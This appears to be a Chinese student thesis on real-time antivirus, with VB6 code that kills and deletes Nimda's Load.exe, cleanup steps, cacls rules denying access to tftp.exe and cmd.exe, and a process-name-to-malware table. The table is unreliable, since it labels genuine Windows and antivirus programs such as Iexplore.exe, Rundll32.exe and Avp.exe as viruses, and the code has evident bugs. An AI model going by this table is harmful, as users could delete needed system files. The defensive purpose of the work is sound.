 为什么在Windows环境下需要使用实时反病毒技术？这是由Windows的多任务特性决定的。对于同时运行多个任务的情况，传统基于DOS的反病毒技术无法在Windows环境下发挥正常的反病毒功能，因为它无法控制其他任务所使用的资源。只有在较高优先级上，对系统资源进行全面、实时的监控，才有可能解决Windows多任务环境下的反病毒问题。
 有的用户可能会问：是否可以使用防病毒卡或传统的常驻内存（TSR）技术来实现这种实时化的反病毒功能？ 答案是“不行”。由于防病毒卡存在与系统不兼容、只预防不杀毒、安装不便、误报警等原因，已使其无法在市场上立足。虽然在传统DOS环境下有些反病毒产品使用了TSR实现了病毒防治的实时化，但它们却普遍存在兼容性方面的问题。即使我们抛开兼容性不谈，假定这种TSR能够很好地工作在Windows环境下，又将发生什么？我们将看到Windows 仍将它作为实模式窗口（有时又被称为DOS虚拟机）打开，这种实模式窗口所能访问到的资源是固定的，是由Windows分配的。出于安全性考虑，Windows不允许这个TSR访问不属于它的资源（特别是系统关键数据）。如果此时系统遭受病毒入侵（比如病毒企图改写硬盘主引导扇区），将会发生什么情况？一般情况下，TSR检测不到这种病毒行为， 即发生了所谓“漏报”。更严重的情况可能是TSR发现了这种病毒行为，但由于系统认为所涉及的资源与该TSR所属于的实模式窗口无关而产生了操作冲突，这种情况下，TSR非但杀不了病毒，还很有可能造成系统被挂起或系统崩溃。
 实时反病毒概念最根本的优点是解决了用户对病毒的“未知性”，或者说是“不确定性”问题。用户的“未知性”实时计算机反病毒技术发展至今一直没有得到很好解决的问题之一。值得一提的是，到现在还总是会听到有人说：“有病毒？用杀毒软件杀就行了。”问题出在这个“有”字上，用户判断有无病毒的标准是什么？实际上等到用户感觉到系统中确实有病毒在做怪的时候，系统已到了崩溃的边缘。实时监测是先前性的，而不是滞后性的。任何程序在调用之前都被先过滤一遍。一有病毒侵入，它就报警，并自动杀毒，将病毒拒之门外，做到防患于未然。这和等病毒侵人后甚至破坏以后再去杀绝对不一样，其安全性更高。互联网是大趋势，它本身就是实时的、动态的，网络已经成为病毒传播的最佳途径，迫切需要具有实时性的反病毒软件。
 实时反病毒技术能够始终作用于计算机系统之中，监控访问系统资源的一切操作，并能够对其中可能含有的病毒代码进行清除，这也正与“及早发现、及早根治”的医学上早期治疗方针不谋而合了。
 病毒防火墙的概念正是为真正实现实时反病毒概念的优点而提出来的。病毒防火墙其实是从近几年颇为流行的信息安全防火墙中延伸出来的一种新概念，其宗旨就是对系统实施实时监控，对流入、流出系统的数据中可能含有的病毒代码进行过滤。这一点正好体现了实时防病毒概念的精髓——解决了用户对病毒的“未知性”问题。
 与传统防杀毒模式相比，“病毒防火墙”有着明显的优越性。首先，它对病毒的过滤有着良好的实时性，也就是说病毒一旦入侵系统或从系统向其他资源感染时，它就会自动将其检测到并加以清除，这就最大可能地避免了病毒对资源的破坏。其次，“病毒防火墙”能有效地阻止病毒从网络向本地计算机系统的入侵。而这一点恰恰是传统杀毒工具难以实现的，因为它们顶多能静态清除网络驱动器上已被感染文件中的病毒，对病毒在网络上的实时传播却根本无
能为力，但“实时过滤性”技术就使杀除网络病毒成了“病毒防火墙”的拿手好戏。再者，“病毒防火墙”的“双向过滤”功能保证了本地系统不会向远程（网络）资源传播病毒。这一优点在使用电子邮件时体现得最为明显，因为它
能在用户发出邮件前自动将其中可能含有的病毒全都过滤掉，确保不会对他人造成无意的损害。最后，“病毒防火墙”还具有操作更简便、更透明的好处。有了它自动、实时的保护，用户再也无需隔三差五就得停下正常工作而去费时费
力地查毒、杀毒了。
3.3.4虚拟现实
　　对于未来技术的展望可能只是一种近乎飘渺的幻想，但是就如同计算机病毒最初的描述出现在科幻小说里，虽然还有许许多多我们目前仍在实现却仍未实现的技术，甚至还有许多我们根本未考虑到的因素。只要技术足够成熟，网络世界中是完全有可能出现类似人工智能的反病毒技术。
　　未来反病毒的疑难之一就是：我们永远无法写出一个合理的程序来辨识和查杀病毒。病毒掌握了人类所掌握的一切，它同样能辨识和分析反毒程序，并对自身重新编程；而反毒程序要可能同样地对病毒进行探测，再进行自编程。病毒与反毒程序的角逐就变成了自编程能力的实现，而这样的结果只能导致网络空间紧张，甚至崩溃！
　　我们还可以考虑用另一种方式：人工进入计算网络世界的方法来查杀病毒。人有足够的智能和经验积累来完成对病毒的辨识和杀除，而这就只剩下建立人与计算机之间的“桥”的问题了。
　　目前的虚拟现实技术重点放在了对人与人的自然界交流方式——“感官”的计算机描述的实现上，它如同人们所有的知觉都最终传感给大脑，大脑对这种传感作出一种体验上的描述，从而形成知觉意识。如果计算机将二进制代码流表述成脑电波的流信息，并通过神经传感给大脑，则完全可以描述并引导、控制人的一切思维。简单地说，人的思维与计算机语言存在了这样一个通用的接口！
　　这种理论如果得以实现，则虚拟现实技术将进入新的发展领域。虽然从理论上讲是不可能在对病毒未知的情况下对其做出精确判断从而预防，但是在实际应用中，经过反病毒专家多年的统计、分析、研究积累的经验，完全有可能以概率方式对病毒危险进行一种分级制测定并对其使用反病毒程序，在相当程度上达到较精确地防御未知病毒的侵入。
3.4尼姆达（Nimda）蠕虫病毒嗅探器的设计
3.4.1 设计原理
 对于大多数病毒而言，杀毒的思路其实很简单，那就是：终止病毒的进程、删除自启动项目（一般在注册表中的run*主键下）、删除病毒文件，对设置了文件关联的病毒而言还要修改注册表恢复文件关联。
 由于对尼姆达（Nimda）蠕虫病毒代码的研究过于繁杂，技术要求比较高。这里我们制作一个简易的尼姆达（Nimda）蠕虫病毒的专杀——尼姆达（Nimda）蠕虫病毒嗅探器，采用字符串比较法，取得进程与所给进程名Load.exe顺序比较，如果相同，则结束病毒进程，并删除病毒源文件。
3.4.2 开发工具的选择
 本程序用到的工具是VB6.0语言。Visual Basic（简称VB）是Microsoft公司开发的一种通用的基于对象的程序设计语言。“Visual”指的是开发图形用户界面(GUI)的方法——不需编写大量代码去描述界面元素的外观和位置，而只要把预先建立的对象add到屏幕上的一点即可。“Basic”指的是BASIC(Beginners All-Purpose Symbolic Instruction Code)语言，一种在计算技术发展历史上应用得最为广泛的语言。Visual Basic在原有BASIC语言的基础上进一步发展，至今包含了数百条语句、函数及关键词，其中很多和Windows GUI有直接关系。专业人员可以用Visual Basic实现其它任何Windows编程语言的功能，而初学者只要掌握几个关键词就可以建立实用的应用程序。Visual Basic Scripting Edition (VBScript)是广泛使用的脚本语言，它是Visual Basic语言的子集，可嵌入HTML语言中，用于网页设计，如ASP（Active Server Page）文件。VB简单易学，通用性强，用途广泛。VB可以用于可以开发多媒体、数据库、网络、图形等方面的应用程序。[8]
3.4.3 尼姆达（Nimda）蠕虫病毒嗅探器的设计代码:
新建模块：代码如下
Option Explicit
Public Const FO_MOVE = &H1
Public Const FO_COPY = &H2
Public Const FO_DELETE = &H3
Public Const FO_RENAME = &H4
Public Const FOF_NOCONFIRMATION = &H10
Public Const FOF_NOCONFIRMMKDIR = &H200
Public Const FOF_ALLOWUNDO = &H40
Type SHFILEOPSTRUCT
hWnd As Long
wFunc As Long
pFrom As String
pTo As String
fFlags As Integer
fAborted As Boolean
hNameMaps As Long
sProgress As String
End Type
Declare Function SHFileOperation Lib "shell32.dll" Alias "SHFileOperationA" (lpFileOp As SHFILEOPSTRUCT) As Long
在form窗体上添加三个CommandButton和一个ListBox
Dim ProcessID() As Long  ' 按list1中的进程顺序存储所有进程ID
'---------------API常数声明 -----------------
Private Const TH32CS_SNAPheaplist = &H1
Private Const TH32CS_SNAPPROCESS = &H2
Private Const TH32CS_SNAPthread = &H4
Private Const TH32CS_SNAPmodule = &H8
Private Const TH32CS_INHERIT = &H80000000
Private Const MAX_PATH As Integer = 260
Private Const TH32CS_SNAPall = TH32CS_SNAPPROCESS + TH32CS_SNAPheaplist + TH32CS_SNAPthread + TH32CS_SNAPmodule
'-------------- API类型声明 --------------
Private Type PROCESSENTRY32     '进程
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Type MODULEENTRY32   '模块
dwSize As Long
th32ModuleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Byte
modBaseSize As Long
hModule As Long
szModule As String * 256
szExePath As String * 1024
End Type
Private Type THREADENTRY32    '线程
dwSize As Long
cntUsage As Long
th32threadID As Long
th32OwnerProcessID As Long
tpBasePri As Long
tpDeltaPri As Long
dwFlags As Long
End Type
'-------------- API声明 ------------
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapShot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapShot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, lppe As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, lppe As PROCESSENTRY32) As Long
Private Declare Function Thread32First Lib "kernel32" (ByVal hSnapShot As Long, lppe As THREADENTRY32) As Long
Private Declare Function Thread32Next Lib "kernel32" (ByVal hSnapShot As Long, lppe As THREADENTRY32) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
以下为各个事件代码：
’获得当前运行进程的所有程序
Private Sub command1_Click()    '“进程列表”按扭
Dim Process As PROCESSENTRY32
Dim ProcSnap As Long
Dim cntProcess As Long
cntProcess = 0
List1.Clear
ProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
If ProcSnap Then
Process.dwSize = 1060 ' 通常用法
Process32First ProcSnap, Process
Do Until Process32Next(ProcSnap, Process) < 1 ' 遍历所有进程直到返回值为False
List1.AddItem Trim(Process.szExeFile)
cntProcess = cntProcess + 1
Loop
End If
ReDim ProcessID(cntProcess) As Long
Dim i As Long
i = 0
Process32First ProcSnap, Process
Do Until Process32Next(ProcSnap, Process) < 1 ' 遍历所有进程直到返回值为False
ProcessID(i) = Process.th32ProcessID
i = i + 1
Loop
CloseHandle (ProcSnap)
End Sub
’取得进程句柄，顺序比较。
Private Sub command2_Click()    '“查杀尼姆达”按扭
Dim proc As PROCESSENTRY32
Dim snap As Long
Dim exename As String
snap = CreateToolhelp32Snapshot(TH32CS_SNAPall, 0) '获得进程“快照”的句柄
proc.dwSize = Len(proc)
theloop = ProcessFirst(snap, proc) '获取第一个进程，并得到其返回值
While theloop <> 0 '当返回值非零时继续获取下一个进程
exename = proc.szExeFile
a = InStr(exename, "Load.exe")
Debug.Print exename
If a <> 0 Then
hand = OpenProcess(1&, True, CLng(proc.th32ProcessID))
TerminateProcess hand, 0
pFrom = "c:\windows\system\load.exe"
SHFileOp.wFunc = FO_DELETE
SHFileOp.pFrom = pFrom
SHFileOp.fFlags = FOF_ALLOWUNDO + FOF_NOCONFIRMATION
SHFileOperation SHFileOp
MsgBox "发现尼姆达病毒程序Load.exe！删除病毒成功！", , "OK"
CloseHandle snap
End If
theloop = ProcessNext(snap, proc)
Wend
CloseHandle snap '关闭进程“快照”句柄
MsgBox "对不起没有找到病毒程序Load.exe", , "提示"
End Sub
Private Sub Command3_Click()    '“结束”按扭
Unload Me
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Dim IntR As Integer
IntR = MsgBox("确定要退出吗？", vbYesNo, "退出确认")
If IntR = vbNo Then Cancel = -1
End Sub

3.5 结果
在VB 6.0运行环境下，运行代码正确。程序运行界面如下：  

图3-1 程序开始界面

图3-2 遍列所有进程

 图3-3 找到病毒进程并结束病毒进程，删除病毒文件
图3-4 没有找到病毒进程
3.6尼姆达（Nimda）蠕虫病毒解决方法
 建议受到蠕虫感染的用户重新安装系统，以便清除其他潜在的后门。如果您不能立刻重装系统，您可以参考下列步骤来清除蠕虫或者防止被蠕虫攻击：
1. 下载IE和IIS的补丁程序到受影响主机上。
2. 安装杀毒软件和微软的CodeRedII清除程序。
3. 备份重要数据。
4. 断开网络连接（例如拔掉网线）。
5. 执行杀毒工作,清除可能的CodeRedII蠕虫留下的后门。
6. 安装IE和IIS的补丁。
7. 重新启动系统。
8. 再次运行杀毒软件以确保完全清除蠕虫病毒。
9. 采取一些其他的预防措施(见下面的介绍)。
10. 将计算机重新与网络连接。
 由于蠕虫修改和替换了大量的系统文件，因此手工清除可能比较繁琐而且不易清除干净。我们建议用户使用最新版本的反病毒厂商的杀毒软件来进行清除工作。目前各大反病毒厂商都已经可以查杀这种蠕虫病毒。您可能需要多次运行杀毒软件或清除程序，以确保彻底杀掉受感染的文件。
 我们建议您在杀毒之前备份您的重要数据，以避免可能的数据丢失。具体清除步骤如下(这时应当已经断开网络连接)：
1. 对于Windows 95/98/ME用户，您需要手工编辑C:\windows\system.ini(假设您的Windows系统安装在C:\)，找到如下行：
Shell = explorer.exe load.exe -dontrunold
将其改为：Shell = explorer.exe，保存退出，重新启动计算机。
2. 运行杀毒软件清除病毒。
3. 运行清除CodeRedII蠕虫的工具。
4. 重新禁止guest用户，并将guest用户从Administrators组中删除(只有对于Windows NT/2000用户需要执行此步骤)
5. 检查您的共享。对于Windows 95/98/ME用户，应当删除各个硬盘的共享。对于Windows NT/2000用户，确保您的管理员口令具有足够的强度。
6. 重启动计算机并再次运行杀毒软件以确保完全清除蠕虫病毒。
3.7防范措施
2.3.6.1对于不提供IIS服务的普通用户防范措施：
1. 您应当首先在IE浏览器菜单中选择：
工具/Internet选项/安全/Inernet/自定义级别...
在“脚本”栏其中禁用"Java 小程序脚本"和"活动脚本"。在“下载”栏中禁止“文件下载”。以防止用户浏览被蠕虫感染的页面时自动下载并执行蠕虫代码。
2. 不要执行收到邮件中的附件程序。
3. 根据您浏览器的版本，将您的IE升级到最新版本。
注：如果您并不需要使用IIS服务，但是由于缺省安装时选择了IIS服务，那么我们建议您立刻卸载或者禁止启动IIS服务。
2.3.6.2对于需要提供IIS服务用户的防范措施：
1. 禁止任何用户执行tftp.exe和cmd.exe
对于使用NTFS分区的用户，您可以以管理员身份在命令行窗口中执行下列命令：
c:\> cacls %systemroot%\system32\tftp.exe /e /d Everyone
c:\> cacls %systemroot%\system32\cmd.exe /e /d Everyone
如果您的系统使用的是FAT32分区而不是NTFS分区，上述命令无效，您可以通过将tftp.exe和cmd.exe改名来使蠕虫不能执行这两个程序。其他一些重要的程序可能也需要进行权限限制，例如net.exe, 等等。
2. 检查是否您的系统中还有CodeRedII或者Sadmind/IIS蠕虫留下的后门，您可以使用微软提供的清除工具CodeRedCleanup来进行清除：
3. 使用regedit删除下列键值(可选)：
HKEY_CLASSES_ROOT\.eml
HKEY_CLASSES_ROOT\.nws
4. 删除不必要的可执行虚拟目录，例如/scripts,/MSADC, /_vti_bin等等。
5. 安装最新的安全补丁：
安装微软最新的IIS安全漏洞补丁合集。
注意：安装补丁的时候最好断掉网络连接。[7]
2.3.6.3对于提供了文件共享服务用户的防范措施：
检查您的文件共享目录，如果您并不真的需要提供文件共享服务。删除共享。如果您必须要提供共享服务，确保为其设置足够强度的口令，并尽量禁止共享目录开放写权限。

4.总结
    在本程序的开发过程中，由于本人是初次接学习接触蠕虫病毒，在知识、经验方面都存在着不足。另外，在整个研究过程中，时间也比较仓促。因此，该系统必然会存在一些缺陷和不足。因为对蠕虫病毒不够熟悉，在Nimda病毒分析未能做到完全满足老师的需求。虽然现今Nimda病毒进程嗅探器不能够在现实生活中得到运用。但是随着未来的发展，程序功能的改进，尽可能在不足方面上给以补充和完善。以后还是有机会应用在实际应用中。
 由于程序设计是对Nimda病毒的，并且只能做到查找和查杀功能，还有许多的设想，功能，由于时间和自身和因素无法得以实现，这不能不说是本次设计的遗憾之处。希望今后能有所突破。
 这次的设计已经启发了我的思维，提高了我的动手能力，这是我在课本中学不到的。它为我在以后的工作岗位上发挥自己的才能奠定了坚实的基础。
  
致  谢
 在论文即将完成之际，回顾紧张而又充实的学习开发过程，本人在此向所有关心我、帮助我的老师和同学们致以最真诚的感谢。
 在本次毕业设计中，我从指导老师——陈建能老师身上学到了很多东西。他认真负责的工作态度，严谨的治学精神和深厚的理论水平都使我收益匪浅。他无论在理论上还是在实践中，都给与我很大的帮助，使我得到很大的提高，这对于我以后的工作和学习都有一种巨大的帮助，在此感谢他耐心的辅导。在撰写论文阶段，陈老师几次审阅我们的论文，提出了许多宝贵意见，没有他的指导，我们就不能较好的完成课题设计的任务。
 另外，我还要感谢在这几年来对我有所教导的老师，他们孜孜不倦的教诲不但让我学到了很多知识，而且让我掌握了学习的方法，更教会了我做人处事的道理，在此表示感谢。同时，在软件设计过程中多位同学也给了我不少帮助及意见，这里一一表示感谢。

参考文献
[1] 张小磊.计算机病毒诊断与防治[M].北京希望电子出版社,2003.
[2] 梅筱琴.计算机病毒防治与网络安全手册[M].海洋出版社,2001.
[3] 吴启迪.计算机病毒防治活用百问[M].上海科学技术出版社,2002.
[4] 朱代祥.计算机病毒揭密[M].人民邮电出版社,2002.
[5] (美) Peter Szor .计算机病毒防范艺术[M].机械工业出版,2007.
[6] 韩筱卿,钟玮,王建锋等.计算机病毒分析与防范大全[M].电子工业出版社,2006.
[7] 张仁斌,李钢,侯整风.计算机病毒与反病毒技术[M].清华大学出版社，2006.
[8] 罗朝盛.Visual Basic 6.0 程序设计教程[M].人民邮电出版社,2005.7.

附录
附录1 : 常见病毒、木马进程速查表                                         
 .exe  →  BF Evolution                    Mbbmanager.exe  →  聪明基因
 _.exe  →  Tryit                          Mdm.exe  →  Doly 1.6-1.7
 Aboutagirl.exe  →  初恋情人              Microsoft.exe  →  传奇密码使者
 Absr.exe  →  Backdoor.Autoupder          Mmc.exe  →  尼姆达病毒
 Aplica32.exe  →  将死者病毒              Mprdll.exe  →  Bla
 Avconsol.exe  → 将死者病毒               Msabel32.exe  → Cain and Abel  
 Avp.exe  →  将死者病毒                   Msblast.exe  →  冲击波病毒
 Avp32.exe  →  将死者病毒                 Mschv.exe  →  Control
 Avpcc.exe  →  将死者病毒                 Msgsrv36.exe  →  Coma
 Avpm.exe  →  将死者病毒                  Msgsvc.exe  →  火凤凰
 Avserve.exe  →  震荡波病毒               Msgsvr16.exe  →  Acid Shiver
 Bbeagle.exe  →  恶鹰蠕虫病毒             Msie5.exe  →  Canasson
 Brainspy.exe  →  BrainSpy vBeta          Msstart.exe  →  Backdoor.livup
 Cfiadmin.exe  →  将死者病毒              Mstesk.exe  →  Doly 1.1-1.5
 Cfiaudit.exe  →  将死者病毒              Netip.exe  →  Spirit 2000 Beta
 Cfinet32.exe  →  将死者病毒              Netspy.exe  →  网络精灵
 Checkdll.exe  →  网络公牛                Notpa.exe  →  Backdoor
 Cmctl32.exe  →  Back Construction        Odbc.exe  →  Telecommando
 Command.exe  →  AOL Trojan               Pcfwallicon.exe  →  将死者病毒
 Diagcfg.exe  →  广外女生                 Pcx.exe  →  Xplorer
 Dkbdll.exe  →  Der Spaeher               Pw32.exe  →  将死者病毒
 Dllclient.exe  →  Bobo                   Recycle - Bin.exe  →  s**tHeap
 Dvldr32.exe  →  口令病毒                 Regscan.exe  →  波特后门变种
 Esafe.exe  →  将死者病毒                 Tftp.exe  →  尼姆达病毒
 Expiorer.exe  →  Acid Battery            Thing.exe  →  Thing
 Feweb.exe  →  将死者病毒                 User.exe  →  Schwindler
 Flcss.exe  →  Funlove病毒                Vp32.exe  →  将死者病毒
 Frw.exe  →  将死者病毒                   Vpcc.exe  →  将死者病毒
 Icload95.exe  →  将死者病毒              Vpm.exe  →  将死者病毒
 Icloadnt.exe  →  将死者病毒              Vsecomr.exe  →  将死者病毒
 Icmon.exe  →  将死者病毒               Server.exe  →  Revenger, WinCrash, YAT
 Icsupp95.exe  →  将死者病毒              Service.exe  →  Trinoo
 Iexplore.exe  →  恶邮差病毒              Setup.exe  →  密码病毒或Xanadu
 Rpcsrv.exe  →  恶邮差病毒                Sockets.exe  →  Vampire
 Rundll.exe  →  SCKISS爱情森林            Something.exe  →  BladeRunner
 Rundll32.exe→  狩猎者病毒                Spfw.exe  →  瑞波变种PX        
 Runouce.exe  →  中国黑客病毒             Svchost.exe (线程105)  →  蓝色代码
 Scanrew.exe  →  传奇终结者               Sysedit32.exe  →  SCKISS爱情森林
 Scvhost.exe  →  安哥病毒                 Sy***plor.exe  →  wCrat
 Server 1. 2.exe  →  Spirit 2000 1.2fixed Sy***plr.exe  →  冰河
 Intel.exe  →  传奇叛逆                   Syshelp.exe  →  恶邮差病毒
 Internet.exe  →  传奇幽灵                Sysprot.exe  →  Satans Back Door
 Internet.exe  →  网络神偷                Sysrunt.exe  →  Ripper
 Kernel16.exe  →  Transmission Scount      System.exe  →  s**tHeap
 Kernel32.exe  →  坏透了或冰河           System32.exe  →  DeepThroat 1.0
 Kiss.exe  →  传奇天使                   Systray.exe  →  DeepThroat 2.0-3.1
 Krn132.exe  →  求职信病毒               Syswindow.exe  →  Trojan Cow
 Libupdate.exe  →  BioNet                 Task_Bar.exe  →  WebEx
 Load.exe  →  尼姆达病毒                 Taskbar  →  密码病毒 Frethem
 Lockdown2000.exe  →  将死者病毒        Taskmon.exe  →  诺维格蠕虫病毒
 Taskmon32  →  传奇黑眼睛              Tds2-98.exe  →  将死者病毒
 Tds2-Nt.exe  →  将死者病毒              Temp $01.exe  →  Snid
 Tempinetb00st.exe  → The Unexplained     Tempserver.exe  →  Delta Source
 Vshwin32.exe  →  将死者病毒            Vsstart.exe  →  将死者病毒
 Vw32.exe  →  将死者病毒                Windown.exe  →  Spirit 2000 1.2
 Windows.exe  →  黑洞2000               Winfunctions.exe  →  Dark Shadow
 Wingate.exe  →  恶邮差病毒              Wink????.exe  →  求职信病毒
 Winl0g0n.exe  →  笑哈哈病毒             Winmgm32.exe  →  巨无霸病毒
 Winmsg32.exe  →  Xtcp                  Winprot.exe  →  Chupachbra
 Winprotecte.exe  →  Stealth                Winrpc.exe  →  恶邮差病毒
 Winrpcsrv.exe  →  恶邮差病毒             Winserv.exe  →  Softwarst
 Wubsys.exe  →  传奇猎手                 Winupdate.exe  →  Sckiss爱情森林
 Winver.exe  →  Sckiss爱情森林            Winvnc.exe  →  恶邮差病毒
 Winzip.exe  →  ShadowPhyre               Wqk.exe  →  求职信病毒
 Wscan.exe  →  AttackFTP                 Xx.Tmp.exe  →  尼姆达病毒
 Zcn32.exe  →  Ambush                   Zonealarm.exe  →  将死者病
 

相关论文